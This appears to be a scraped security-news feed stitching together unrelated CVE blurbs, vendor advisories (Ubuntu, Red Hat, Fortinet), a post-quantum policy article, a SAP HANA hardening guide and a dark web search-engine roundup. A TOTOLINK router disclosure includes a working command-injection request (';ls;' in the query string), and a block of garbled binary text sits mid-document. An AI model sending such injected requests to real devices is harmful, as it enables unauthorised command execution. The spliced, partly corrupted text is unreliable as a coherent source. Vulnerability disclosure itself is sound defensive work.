An information exposure through log file vulnerability in Brocade SANNav versions before Brocade SANnav 2.2.0 could allow an authenticated, local attacker to view sensitive information such as ssh passwords in filetansfer.log in debug mode. To exploit this vulnerability, the attacker would need to have valid user credentials and turn on debug mode.

CVE-2022-28161

Government sets out plan for post-quantum encryption

John Leyden 09 May 2022 at 13:58 UTC

Government sets out plan for post-quantum encryption

The Biden administration has made a policy commitment to promote US leadership in the emerging technology of quantum computing.

The National Security Memo on quantum computing, published last week, directs US federal agencies to prepare for the advent of both quantum computing and the related technology of quantum-resistant cryptography.

The policy commitment is important because it puts the weight of US federal government spending into a nascent technology that represents a paradigm shift in how computers work.

Catch up on the latest encryption-related news and analysis

Quantum computers rely on the properties of quantum states – such as superposition or entanglement – rather than the simple binary states (0 or 1) of current PCs and servers.

When combined with quantum algorithms the technology can be expected to solve some mathematical problems, such as integer factorization, in short order.

This poses a threat to current encryption schemes, data from which might be vulnerable to “capture now, decrypt later” attacks enabled by the quantum computers of the future.

**Post-quantum encryption**

Fortunately, cryptographers and computer scientists are aware of the threat and are already working with the US National Institute for Standards and Technology (NIST) in selecting a preferred algorithm for post-quantum encryption.

Ahead of formal ratification, several viable schemes have already been proposed. Developers of the OpenSSH secure networking utility are ‘future-proofing’ the technology by adopting the NTRU Prime algorithm, a scheme designed to protect against brute-force attacks mounted by the more capable quantum computers of the future.

The Biden administration’s National Security Memo directs NIST to establish a “migration to post-quantum cryptography project” at the National Cybersecurity Center of Excellence, as well as an open working group within the industry to generate further research and to promote the adoption of quantum-resilient cryptographic standards and technologies.

**RECOMMENDED** UK government calls for tougher protections against malicious mobile apps

The policy also sets requirements for federal agencies to update cryptographic systems. Specifically, by the end of next year US federal agencies should have a policy for hardening security against quantum computers that can easily crack encryption keys.

Industry experts welcomed the US government’s commitment to quantum computing as timely.

Mike DeVries Vermeer, a scientist who writes about tech policy for the non-profit RAND Corporation, told _The Daily Swig_: “\[The\] timeline for quantum computing varies, but data-in-transit now is vulnerable if it needs to stay secret for a long time.”

Vermeer concluded: “Transitions like this take decades.”

**YOU MAY ALSO LIKE** OpenSSH 9.0 bakes in post-quantum cryptography to future proof against attacks

Quantum leap: Biden administration commits to ensuring US leadership in emerging tech

RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.

�4�rb�YtT՝��\_1���TP�6 U� �5�b䗬"�d�M�#3��yo& �54�Flt����ʞÞ�-g�=t�n(X���l9\[��ݢ4�M�E�h�����$���\_�=� �}��������~��{ߐ�oR���ys���ͭ��UW?{N���ٵ7ף~^���ʘ�Y�O���i�P���ݟj�?�IC\\1;n�5q��,Ơ�7�����gϩ�\]���9ʨ�,��?��/0�Az�IGʹ�\]ψ9i�u�v��#�������+̴i�;#n7NԎ��e|t�����ό�\]c��k��wl'�F��#�J/WȘ��k�e��cq�^.�"N��L�ՎG#�t�5��(��̈�f�K����g�^�x3�<ͷ��I�����ڞ�$�Hą��M:%�^�2�ܳ�i�g�@:烮1V��&��N&1~:ẅ́q�N���D�7�\_p=�7��kch��\`�|��at#�v"��Q���92�p�.fǈ�i3�9�3,B�,ݸ4?�vJ&β˰,aD�J�=�#b:Q��'e�Ü�\[����|�%an����aj��J���ZN&��i'��+�i6e��@���ܰc����f~��y\_�ǑA��:?��'S�Iޅ�f�4 �њ���

CVE-2022-30333

By Waqas
Let’s take a closer look at what a dark web search engine is, how to find them and…
This is a post from HackRead.com Read the original post: What Are Dark Web Search Engines and How to Find Them?

**Let’s take a closer look at what a dark web search engine is, how to find them and what are some of the best dark web search engines out there.**

The web is full of information. To find that information, you need search engines. The dark web search engine is one of the best ways to find information that is hidden from the public. There are many different dark web search engines, and they each have their specialty.

To understand what they do, their strengths, and how to find them, you need to know a little bit about the dark web (also known as the hidden web). The **dark web** is a network of Onion websites and services that are only accessible through the Tor browser.

There are many uses for the dark web, but one of the most common is finding hidden information. That’s where dark web search engines come in. They let you find sites that aren’t easily accessible by the general public but are useful for finding information about things like hacking, drugs, leaked data, and other activities a lot of which can be illegal.

Let’s take a closer look at what a dark web search engine is, how to find them and what are some of the best dark web search engines out there.

**What is a Dark Web Search Engine?**

A dark web search engine is a tool that lets you find hidden information on the dark web. There are many different types of dark web search engines, and each has its specialty. For example, some have better searching capabilities than others. Some specialize in finding surveillance tools or tips and tricks for journalists to tackle government-led surveillance and censorship while some search engines will find sites with illegal content like drugs or cybercrime activities. Others are more generalized and will find almost anything on the dark web.

**How to Find Dark Web Search Engines**

There are many dark web search engines, which can be a bit overwhelming. You will be able to find them by doing a little research. However, there are some common searches that you can do to help with your search. One of the most popular is “Dark Web Search Engine” on Google. This will give you a list of websites that allow you to search the dark web.

But since you are on Hackread.com, you don’t have to Google it. We got you. Here are 5 best dark web search engines:

**Best Dark Web Search Engine in 2022**

As mentioned earlier, there are several dark web search engines with different searching algorithms. We are listing 5 of the best dark web search engines that are known for displaying appropriate and desired results.

**Ahmia.fi**

Ahmia.fi remains reliable and also has a policy against any “abuse material”, something different from many other dark web search engines that also index websites featuring child sexual abuse content. Ahmia is also available on the **surface web** and supports searches on the i2p network as well. You can visit Ahmia’s .Onion domain **here**. 

**The Hidden Wiki**

The Hidden Wiki is not a literal search engine but it is very useful. You see, whenever you make a search query on a dark web search engine, you’re bound to see 20 spammy links and then maybe 1 legitimate one. This can make it a time-consuming process to search.

However, this Wiki helps solve this by providing a directory list of websites on the dark web allowing you to easily access them. A **surface web version** is also available. Other websites that offer similar content include **TorLinks** and **OnionLinks**. You can visit The Hidden Wiki by following its .Onion link **here**. 

**Haystak**

Claiming to have indexed over 1.5 billion pages which includes more than 260,000 websites, Haystak indeed would stand out to be a resourceful engine on the list. It also has a paid version which offers several additional features such as searching using regular expressions, browsing now-defunct onion sites, and accessing their API. 

You can’t bet them to have your best interests at hand though considering one of these features allows you to access a database of stolen credit card information and email addresses as well. You can visit Haystak by following its .Onion link **here**. 

**Torch**

This one too is one of those search engines that have lasted for long enough(since 1996) but the search results are not impressive. In the query above, I wanted to know Facebook’s onion URL, a very simple piece of information. Yet, it reported everything but that showing how far these search engines have to go to improve.

On the other hand, it is fast and can come in handy regardless. Nevertheless, you can visit Torch by following its .Onion link **here**. 

**DuckDuckGo**

A long-time foe of Google; you’re bound to find this on almost every dark web search engine list. Yet, it reports surface web search results in more than those from the dark web and so the only good point we’re left with is the anonymity it offers. We couldn’t find 1 dark web search result through a couple of random queries.

So DuckDuckGo deserves our honorable mention kudos to its privacy-focused rather than business-oriented vision. You can visit DuckDuckGo by visiting its .Onion link **here**. 

**More Dark Web Topics**

1.  Authorities seize world’s biggest dark web child abuse site
2.  179 Dark Web vendors arrested, 500kg worth of drugs seized
3.  Twitter Goes on Tor with New Dark Web Domain to Evade Censorship
4.  DoJ seizes $1 billion in Bitcoin linked to Silk Road dark web marketplace
5.  CIA Wants Russians to Share Secret Info with the Agency via its Darknet Site

**How Safe Are Dark Web Search Engines?**

Even though dark web search engines are useful for finding information that isn’t accessible to the general public, they can be dangerous. If you are going to use a dark web search engine, it’s important to make sure you don’t use it from your normal computer. You might accidentally be putting your passwords, crypto funds, and other personal information at risk with these search engines.

Plus, some sites on the dark web may have malware that can infect your computer and steal information. However, what’s worse is that some results can lead to highly explicit and disturbing content that you may not be ready for such as child abuse, gore, torture, violence, threatening, terrorism, or other types of illicit content.

Therefore, keep your searches legal and limited to what you are looking for and **avoid using proxies** as hackers can easily infect them with malware or use them to steal your crypto funds.

The safest way to access a dark web search engine is through an anonymous browser like Tor. This browser will help protect your identity and personal data while browsing the dark web. It is also recommended that along with the **Tor browser** you should connect your device to a **VPN**.

Those who are not interested in the Tor browser can use an alternative browser such as:

*   12P
*   Whonix
*   Globus
*   Freepto
*   Disconnect

A full list of Tor browser alternatives is available here.

**How to Use Dark Web Search Engines**

Dark web search engines use complex software to crawl the dark web and index all of the information they find. Once indexed, these search engines allow you to find that information through a search engine interface.

However, not all dark web search engines are created equal. To maximize your searching ability, it’s important to understand what each dark web search engine is best at finding. Some popular dark web search engines include Grams or The Hidden Wiki, each one has its strengths and weaknesses.

For example, Grams search engine is infamously known for illegal drugs while The Hidden Wiki is better for things like eBooks and articles about privacy. No matter which dark web search engine you choose, it will provide you with access to sites that are hidden from the general public but are useful for finding specific types of information.

**Summing up**

To remain safe, be sure to steer clear of search results that may lead you to illegal sites. Always use a reliable VPN and keep your Tor browser up to date to avoid cyber criminals from snooping in.

**Best Security and Privacy Tools**

1.  Best OSINT Tools for 2020
2.  New tool lets teens report, remove their nude photos online
3.  CISA Publishes List of Free Cybersecurity Tools and Services
4.  New Underactor tool reveals pixelated text to expose sensitive data
5.  Download Kali Linux 2022.1 with new tools and wider SSH compatibility

What Are Dark Web Search Engines and How to Find Them?

TOTOLINK N600R v5.3c.5507_B20171031 was discovered to contain a command injection vulnerability via the QUERY_STRING parameter in the "Main" function.

**TOTOLINK N600R V5.3c.5507\_B20171031 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as N600R V5.3c.5507\_B20171031
*   \*\*Firmware download address:\*\*https://www.totolink.net/data/upload/20200728/f984576c47289d782ed65e67edbf06e2.zip

**Description****1.Product Information:**

TOTOLINK N600R V5.3c.5507\_B20171031 router, the latest version of simulation overview：

**2\. Vulnerability details**

TOTOLINK N600R V5.3c.5507\_B20171031 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

We can see that the os will get  QUERY_STRING without filter splice to the string ;ps; and execute it. So, If we can control the QUERY_STRING, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?;ls; HTTP/1.1 
    Host: 192.168.0.1 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0

CVE-2022-27411: GitHub - ejdhssh/IOT_Vul

Ubuntu Security Notice 5354-2 - USN-5354-1 fixed vulnerabilities in Twisted. This update provides the corresponding updates for Ubuntu 14.04 ESM, Ubuntu 16.04 ESM and Ubuntu 22.04 LTS. It was discovered that Twisted incorrectly processed SSH handshake data on connection establishments. A remote attacker could use this issue to cause Twisted to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5354-2  
May 05, 2022

twisted vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Twisted could be made to crash if it received specially crafted network  
traffic.

Software Description:  
- twisted: Event-based framework for internet applications

Details:

USN-5354-1 fixed vulnerabilities in Twisted. This update provides the  
corresponding updates for Ubuntu 14.04 ESM, Ubuntu 16.04 ESM and  
Ubuntu 22.04 LTS.

Original advisory details:  
  It was discovered that Twisted incorrectly processed SSH handshake data on  
  connection establishments. A remote attacker could use this issue to cause  
  Twisted to crash, resulting in a denial of service. (CVE-2022-21716)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
python3-twisted 22.1.0-2ubuntu2.1

Ubuntu 16.04 ESM:  
python-twisted 16.0.0-1ubuntu0.4+esm1  
python-twisted-bin 16.0.0-1ubuntu0.4+esm1  
python-twisted-web 16.0.0-1ubuntu0.4+esm1  
python3-twisted 16.0.0-1ubuntu0.4+esm1

Ubuntu 14.04 ESM:  
python-twisted 13.2.0-1ubuntu1.2+esm2  
python-twisted-bin 13.2.0-1ubuntu1.2+esm2  
python-twisted-web 13.2.0-1ubuntu1.2+esm2

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-5354-2  
https://ubuntu.com/security/notices/USN-5354-1  
CVE-2022-21716

Package Information:  
https://launchpad.net/ubuntu/+source/twisted/22.1.0-2ubuntu2.1

Ubuntu Security Notice USN-5354-2

After extensive testing on RHEL 8.2, 8.4, 8.6 and 9 using the SAP HANA validation test suite, Red Hat’s engineering team concluded that SELinux can run in Enforcing mode with minimal impact to database performance. This is important because it means that RHEL customers will be able to apply higher security levels to their hosts running SAP HANA and tailor the policies to their needs.

SAP HANA is SAP’s in-memory database (DB) that has been around since 2010. It is used as the backbone of their main applications like Enterprise Resource Planning (ERP) or Business Warehouse (BW), or as a standalone application since it incorporates many features that are useful for Big Data and analytics.

There are other databases (Oracle, SQL Server, DB2, MaxDB and Sybase) on which SAP applications can run, but starting in 2027 customers wishing to maintain regular support will have to migrate to the new ERP suite, SAP S/4HANA. The suite only runs on SAP HANA, and Red Hat Enterprise Linux (RHEL) is one of two supported platforms for the database.

All of SAP’s applications are critical since they sit at the core of the company, and SAP HANA is especially resource demanding. Given this criticality, IT departments need to drive the highest levels of security and performance for the SAP ecosystem to limit impact on the company’s operations.

In February 2022, after extensive testing on RHEL 8.2, 8.4, 8.6 and 9 using the SAP HANA validation test suite (which is used by SAP to assess if a system can run SAP HANA at acceptable performance levels), Red Hat’s engineering team concluded that SELinux can run in Enforcing mode (the recommended mode) with a minimal impact to database performance (around 2%, which is acceptable and in line with SAP standards). 

SAP has already modified the OSS Note with the recommendations for SAP HANA on RHEL 8, and will do so for other versions once they have completed the tests themselves.

This is important because it means that RHEL customers will be able to apply higher security levels to their hosts running SAP HANA and tailor the policies to their needs. This adds another piece to the Red Hat platform for SAP workloads that plays a crucial role in providing everything RHEL customers need to manage the entire lifecycle of the SAP hosts in an easier way with a stronger security posture.

**What is SELinux?**

Security-Enhanced Linux (SELinux) is a Linux Security Model (LSM) that allows defining security policies to implement mandatory access controls (MAC), providing a very granular layer to strengthen the OS against attacks. The underlying idea is to regulate or constrain the possible actions of a subject (usually a process) on a target (files, memory, I/O devices, network resources, etc.). 

The policies contain rules that are evaluated when a subject tries to access a target to determine whether access will be allowed. In addition to MAC, SELinux is also based on and implements role-based access control (RBAC).

In SELinux, processes run in domains so they are separated from each other. Each process is assigned a username, a role and a domain, and each target is labeled with a name, role and a type. In the policies, the domains that users need to belong to in order to execute an action on a target (for example to bind to a listening port) are specified. If a process is compromised, the attacker will only have access to the resources in the domain that process has been assigned to, avoiding the danger of that attacker having access to system files and gaining control of the whole operating system.

This is also a very useful feature for applications deployed in containers, as it provides an additional layer of isolation between the containers and the hosts on which they run.

SELinux has 3 operation modes:

*   Enforcing. The policies are active and enforced.
    
*   Permissive. The system uses the policies but it does not deny access to the targets, it just writes the approval and denial messages in the system logs (this mode is normally used to test policies before rolling them out to production).
    
*   Disabled.
    

**Further recommendations**

There are other security guidelines that Red Hat’s engineering team have compiled in this whitepaper as a result of this testing.

**Minimize RHEL and package installation**

The first is to carry out a minimal installation of RHEL on the servers that will host SAP HANA in order to minimize the opportunities for malicious exploits. There are many packages in the OS that aren’t used by a host that only runs SAP HANA, so there is no need to install them as they can be potential points of attack. Besides this, having a minimal installation will make the server update process much easier.

From RHEL 7 on there is an option that allows you to install only the packages needed for basic functionality. In addition to that, the compat-sap c++ and libtool-ltdl will need to be installed as well, as they are used by the DB. Depending on the customer scenario, they might need to install additional packages on top of the minimal installation, but the recommendation from Red Hat is to go for the minimal RHEL installation plus the two additional packages, and then add the rest that are necessary depending on the usage of the DB.

Complementing the minimal package installation, we can use a plugin to whitelist application RPMs. The fapolicyd RPM plugin registers any update done with YUM or RPM package managers and notifies the fapolicyd daemon about changes in the install database. If there is an attempt to install an RPM which is not in the fapolicyd whitelist, it will be denied.

Another recommendation is to disable all of the network services that are not strictly needed for the normal functioning of SAP HANA and for the applications and users to connect to it. Here, as with the OS packages, the fewer network services listening on different ports, the lower the chances of attack. And since network services need to be regularly patched to avoid newly discovered exploits, their maintenance will be easier if their number is reduced. Some of the services whose deactivation is highly recommended are vsftpd (Very Secure FTP Daemon) and  telnet, because the transactions of the former are unencrypted and the latter is an unsecured protocol.

**Restrict user privileges**

The next recommendation for hardening the security of RHEL hosts running SAP HANA is to restrict the number of users that can run the sudo command and thus be able to execute other commands as root.

It’s also very important to disable the possibility of logging in with the root user via ssh, so that it can only be utilized locally on the host. Having another account (with permissions to log on via ssh) that can run a reduced set of administrative commands using ‘su -’ should be enough.

All SAP installations create a user called <sid>adm (‘sid’ is the SAP installation name or identifier) and it has unrestricted permissions over all the SAP processes and files. It is similar to root at SAP level and it also exists for SAP HANA. It is recommended to limit the number of people with access to this user and change its password as soon as the system is handed over to the admin team after installation and set up.

**Automate logouts and password expiry**

The next set of recommendations concerns the password and login policies for the users. It is advised to enable automatic logouts after a certain time of inactivity, to define the validity period of passwords as well as how often they can be changed and to lock out users after a number of failed attempts, so that brute force attacks are prevented.

**Restrict user file and home directory permissions**

There are also things to consider regarding file and user home directory permissions. Newly created files should not by default be readable or modifiable by users other than the one that has created them. In order to achieve this, the default umask for new files should be set to 077, and home directories should only be accessible by their owner.

**Encrypt hard drives**

An added layer of security is achieved by using encrypted hard drives. In order to unlock root and secondary volumes that are encrypted, RHEL provides an implementation of the Policy-Based Decryption (PBD) that allows different unlocking methods to be combined (like user password, Trusted Platform Module devices (TPM), smart cards, etc.) in the form of policies so that the volumes can be unlocked in different ways.

The implementation that comes with RHEL consists of the Clevis framework and plugins called pins. The recommendation is to use one of the subcategories of PBD called Network Bound Disk Encryption (NBDE) with which root volumes can be encrypted (on physical and virtual machines) and the encryption key is tied to an external server (or servers) in a secure and anonymous way across the network.

The node that has the root volumes to be unlocked uses a Clevis client, and the external server(s) are Tang server(s). When the node boots, it tries to connect to the external Tang server(s) performing a cryptographic handshake. If it can reach the minimum number of servers that has been defined (or the only server if there is only one Tang server) it will be able to construct its decryption key to unlock the volume and continue booting. This mechanism makes it more difficult for attackers to gain control of the node because they would need access to it and to the Tang server(s).

**Encrypt network traffic**

SAP HANA supports the use of encrypted channels for both client connections (from applications, users, administration clients or data provisioning tools) and internal DB process communication, so it is recommended to use this feature when the network is not protected in another way.

Another possibility is to use VPN tunnels to transfer encrypted information. It is very important to have a well-defined network topology for SAP HANA tailored to the use cases of the customer. The SAP HANA Security Guide contains many more recommendations that should be taken into account when planning a SAP HANA landscape deployment. A particularly important one is to configure SSL between the DB and the clients.

**Conclusion**

This set of recommendations allows customers to run their SAP workloads in an environment with greater security controls while maintaining very granular control of the processes that keep performance levels at an optimal level. Find out more here: Red Hat Enterprise Linux Security Hardening Guide for SAP HANA 2.0.

Security recommendations for SAP HANA on RHEL

Red Hat Security Advisory 2022-1709-01 - Red Hat Single Sign-On 7.5 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. This release of Red Hat Single Sign-On 7.5.2 serves as a replacement for Red Hat Single Sign-On 7.5.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Issues addressed include a privilege escalation vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256====================================================================                   Red Hat Security AdvisorySynopsis:          Moderate: Red Hat Single Sign-On 7.5.2 security updateAdvisory ID:       RHSA-2022:1709-01Product:           Red Hat Single Sign-OnAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:1709Issue date:        2022-05-04CVE Names:         CVE-2022-1245====================================================================1. Summary:A security update is now available for Red Hat Single Sign-On 7.5 from theCustomer Portal.Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.2. Description:Red Hat Single Sign-On 7.5 is a standalone server, based on the Keycloakproject, that provides authentication and standards-based single sign-oncapabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.5.2 serves as a replacement forRed Hat Single Sign-On 7.5.1, and includes bug fixes and enhancements,which are documented in the Release Notes document linked to in theReferences.Security Fix(es):* keycloak: Privilege escalation vulnerability on Token Exchange(CVE-2022-1245)For more details about the security issue(s), including the impact, a CVSSscore, and other related information, refer to the CVE page(s) listed inthe References section.3. Solution:Before applying the update, back up your existing installation, includingall applications, configuration files, databases and database settings, andso on.The References section of this erratum contains a download link (you mustlog in to download the update).4. Bugs fixed (https://bugzilla.redhat.com/):2071036 - CVE-2022-1245 keycloak: Privilege escalation vulnerability on Token Exchange5. References:https://access.redhat.com/security/cve/CVE-2022-1245https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/security/cve/cve-2022-12454https://access.redhat.com/documentation/en-us/red_hat_single_sign-on/7.5/html/release_notes/indexhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=core.service.rhsso&downloadType=patches&version=7.56. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2022 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBYnKnAdzjgjWX9erEAQi5Yg/9HaBxp+aC8ZwN8GSE3ILzyxlTiwVHlhjWshzX9X5DUREIa1AzxZWh33kAJJax0aCtYEJsITFf9dF4kZk1lbFtZg3p4Z2hPzU+EbKm67O3ENvwFqAKoUeBBzHyQYZGRJU1nUkhkdvY8wGv6eU+Ibfenyk6vBBIOxt6QXwMpGvBYrSb+BwXwxTT9eoWbKMMw8bPwE4UbsSHi58n1zkz3vzlyNZj/jgXN41g3fDSHFPvKlrFLfphu9mhGhZb1kZIunU2nX4JImRFRWyvtqR+vM+Sz8afDAYEhqtU9lzwrnWjI1u7OMdA90zBqRUKO4i6OE3+kDezyZUkEIZy71INJ8Diil03Vj/zBDCDgspqW5Hk8M6A33z8sQV/Y4UL3zD1y4d8lznt/fLolYWdijQNSfDsNgVJr9y9715YtFauPvtpiPNkfp3eocdEoJOiw2hTO6Kba/XjOeU17JWcSoem8W2tW+vZgo6y2NauUJjy5DOrSNrfnYRhY/l/gFjKPQDdzfLaO6HMsTdjygoQzOZ1CE4Ce4OfiaqjmY5vGXCoZ8Vmwu/idLDiDDMno9Zg4l8rTgQIH21jkzkCXAbFlYlK07kL7io/qn391tullM+oJVyCHvypaWXG5JO5P6Ou44rCHmylq5VWMkCFAMQ2ePhOBCRU1wT0P5nU9NKS9dUVhEsin1o=wkw0-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1709-01

An improper access control in Fortinet FortiSOAR before 7.2.0 allows unauthenticated attackers to access gateway API data via crafted HTTP GET requests.

IR Number

FG-IR-22-041

Date

May 3, 2022

Severity

     Medium

CVSSv3 Score

6.8

Impact

Information disclosure

CVE ID

CVE-2022-23443

Affected Products

FortiSOAR : 7.0.2, 7.0.1, 7.0.0, 6.4.4, 6.4.3, 6.4.1, 6.4.0

CVRF

Download

*    Refine Search

** PSIRT Advisories**

**FortiSOAR - Improper access control on gateway API**

**Summary**

An improper access control vulnerability \[CWE-284\] in FortiSOAR may allow an unauthenticated attacker to access gateway API data via crafted HTTP GET requests.

**Affected Products**

FortiSOAR versions 7.0.2 and below,   
FortiSOAR versions 6.4.4 and below,  
FortiSOAR versions 6.0.0,  
FortiSOAR versions 5.x.x

**Solutions**

Please upgrade to FortiSOAR version 7.2.0 or above.

OR

Install a security patch to fix this vulnerability on FortiSOAR affected versions as follows:  
SSH to your FortiSOAR VM and log in as a root user.  
Download the security patch file from the repository server using the following command:  
wget https://update.cybersponse.com/patches/nginx-security-patch /> Update the permissions of the file and run the following commands to apply the patch:  
sudo chmod 755 nginx-security-patch  
sudo ./nginx-security-patch

**Acknowledgement**

Internally discovered and reported by the FortiSOAR development team.

Tag

#ssh